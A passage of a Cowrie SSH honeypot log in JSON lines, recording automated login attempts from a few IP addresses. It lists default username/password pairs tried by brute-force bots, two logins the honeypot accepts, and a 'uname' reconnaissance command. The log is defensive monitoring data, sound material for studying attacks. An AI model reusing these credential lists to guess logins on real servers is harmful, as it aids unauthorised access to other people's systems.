es256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:11.423844Z","src_ip":"212.227.235.229","session":"8fbe5f71ee53"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:12.188254Z","src_ip":"212.227.235.229","session":"8fbe5f71ee53"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:13.444244Z","src_ip":"212.227.235.229","session":"8fbe5f71ee53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60846,"dst_ip":"1.2.3.4","dst_port":22,"session":"757ab2fdccbc","protocol":"ssh","message":"New connection: 212.227.125.160:60846 (1.2.3.4:22) [session: 757ab2fdccbc]","sensor":"my-vps","timestamp":"2025-08-28T03:17:14.012532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:14.013708Z","src_ip":"212.227.125.160","session":"757ab2fdccbc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:14.229420Z","src_ip":"212.227.125.160","session":"757ab2fdccbc"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:14.876995Z","src_ip":"212.227.125.160","session":"757ab2fdccbc"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:16.094718Z","src_ip":"212.227.125.160","session":"757ab2fdccbc"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":35089,"dst_ip":"1.2.3.4","dst_port":22,"session":"8caf38e924e7","protocol":"ssh","message":"New connection: 45.125.211.194:35089 (1.2.3.4:22) [session: 8caf38e924e7]","sensor":"my-vps","timestamp":"2025-08-28T03:17:17.181616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:17.183532Z","src_ip":"45.125.211.194","session":"8caf38e924e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:17.413409Z","src_ip":"45.125.211.194","session":"8caf38e924e7"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:18.292196Z","src_ip":"45.125.211.194","session":"8caf38e924e7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:19.516636Z","src_ip":"45.125.211.194","session":"8caf38e924e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36146,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e8ae3b2266e","protocol":"ssh","message":"New connection: 212.227.235.229:36146 (1.2.3.4:22) [session: 7e8ae3b2266e]","sensor":"my-vps","timestamp":"2025-08-28T03:17:28.142695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:28.143742Z","src_ip":"212.227.235.229","session":"7e8ae3b2266e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:28.398877Z","src_ip":"212.227.235.229","session":"7e8ae3b2266e"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:29.424023Z","src_ip":"212.227.235.229","session":"7e8ae3b2266e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:30.682073Z","src_ip":"212.227.235.229","session":"7e8ae3b2266e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35700,"dst_ip":"1.2.3.4","dst_port":22,"session":"d375034af00b","protocol":"ssh","message":"New connection: 212.227.125.160:35700 (1.2.3.4:22) [session: d375034af00b]","sensor":"my-vps","timestamp":"2025-08-28T03:17:31.074212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:31.075173Z","src_ip":"212.227.125.160","session":"d375034af00b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:31.290423Z","src_ip":"212.227.125.160","session":"d375034af00b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:31.936938Z","src_ip":"212.227.125.160","session":"d375034af00b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32439,"dst_ip":"1.2.3.4","dst_port":22,"session":"3890466ecff0","protocol":"ssh","message":"New connection: 45.125.211.194:32439 (1.2.3.4:22) [session: 3890466ecff0]","sensor":"my-vps","timestamp":"2025-08-28T03:17:31.969766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:31.973892Z","src_ip":"45.125.211.194","session":"3890466ecff0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:32.190089Z","src_ip":"45.125.211.194","session":"3890466ecff0"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:17:33.019365Z","src_ip":"45.125.211.194","session":"3890466ecff0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:33.152902Z","src_ip":"212.227.125.160","session":"d375034af00b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:17:33.528933Z","src_ip":"45.125.211.194","session":"3890466ecff0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:17:33.529599Z","src_ip":"45.125.211.194","session":"3890466ecff0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:33.756235Z","src_ip":"45.125.211.194","session":"3890466ecff0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:33.757330Z","src_ip":"45.125.211.194","session":"3890466ecff0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46586,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0d67a07f551","protocol":"ssh","message":"New connection: 212.227.235.229:46586 (1.2.3.4:22) [session: f0d67a07f551]","sensor":"my-vps","timestamp":"2025-08-28T03:17:33.785178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:33.785923Z","src_ip":"212.227.235.229","session":"f0d67a07f551"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:34.040369Z","src_ip":"212.227.235.229","session":"f0d67a07f551"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:34.806020Z","src_ip":"212.227.235.229","session":"f0d67a07f551"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:36.063366Z","src_ip":"212.227.235.229","session":"f0d67a07f551"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56576,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9a10cc3592","protocol":"ssh","message":"New connection: 212.227.125.160:56576 (1.2.3.4:22) [session: ba9a10cc3592]","sensor":"my-vps","timestamp":"2025-08-28T03:17:43.141050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:43.141739Z","src_ip":"212.227.125.160","session":"ba9a10cc3592"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:43.366718Z","src_ip":"212.227.125.160","session":"ba9a10cc3592"}
{"eventid":"cowrie.login.success","username":"root","password":"aA123456","message":"login attempt [root/aA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:17:44.044219Z","src_ip":"212.227.125.160","session":"ba9a10cc3592"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:17:44.563871Z","src_ip":"212.227.125.160","session":"ba9a10cc3592"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:17:44.564519Z","src_ip":"212.227.125.160","session":"ba9a10cc3592"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:44.790917Z","src_ip":"212.227.125.160","session":"ba9a10cc3592"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:44.792198Z","src_ip":"212.227.125.160","session":"ba9a10cc3592"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":11293,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2b9e371c25d","protocol":"ssh","message":"New connection: 45.125.211.194:11293 (1.2.3.4:22) [session: a2b9e371c25d]","sensor":"my-vps","timestamp":"2025-08-28T03:17:46.863897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:17:46.887409Z","src_ip":"45.125.211.194","session":"a2b9e371c25d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:17:47.075132Z","src_ip":"45.125.211.194","session":"a2b9e371c25d"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:47.910917Z","src_ip":"45.125.211.194","session":"a2b9e371c25d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:49.123407Z","src_ip":"45.125.211.194","session":"a2b9e371c25d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46102,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d65ab7347d","protocol":"ssh","message":"New connection: 212.227.235.229:46102 (1.2.3.4:22) [session: f2d65ab7347d]","sensor":"my-vps","timestamp":"2025-08-28T03:17:54.054847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:17:54.055468Z","src_ip":"212.227.235.229","session":"f2d65ab7347d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:17:54.154202Z","src_ip":"212.227.235.229","session":"f2d65ab7347d"}
{"eventid":"cowrie.login.failed","username":"canvas","password":"canvas","message":"login attempt [canvas/canvas] failed","sensor":"my-vps","timestamp":"2025-08-28T03:17:54.616518Z","src_ip":"212.227.235.229","session":"f2d65ab7347d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:17:55.724054Z","src_ip":"212.227.235.229","session":"f2d65ab7347d"}
